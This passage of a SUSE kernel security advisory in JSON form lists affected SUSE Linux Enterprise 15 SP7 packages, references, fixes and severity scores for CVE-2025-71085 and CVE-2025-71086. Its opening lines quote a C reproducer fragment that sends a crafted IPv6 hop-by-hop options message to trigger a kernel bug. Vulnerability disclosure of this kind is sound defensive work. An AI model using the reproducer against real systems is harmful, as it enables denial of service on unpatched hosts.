cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
},
{
"cve": "CVE-2025-71086",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71086"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: rose: fix invalid array index in rose_kill_by_device()\n\nrose_kill_by_device() collects sockets into a local array[] and then\niterates over them to disconnect sockets bound to a device being brought\ndown.\n\nThe loop mistakenly indexes array[cnt] instead of array[i]. For cnt \u003c\nARRAY_SIZE(array), this reads an uninitialized entry; for cnt ==\nARRAY_SIZE(array), it is an out-of-bounds read. Either case can lead to\nan invalid socket pointer dereference and also leaks references taken\nvia sock_hold().\n\nFix the index to use i.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71086",
"url": "https://www.suse.com/security/cve/CVE-2025-71086"
},
{
"category": "external",
"summary": "SUSE Bug 1256625 for CVE-2025-71086",
"url": "https://bugzilla.suse.com/1256625"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
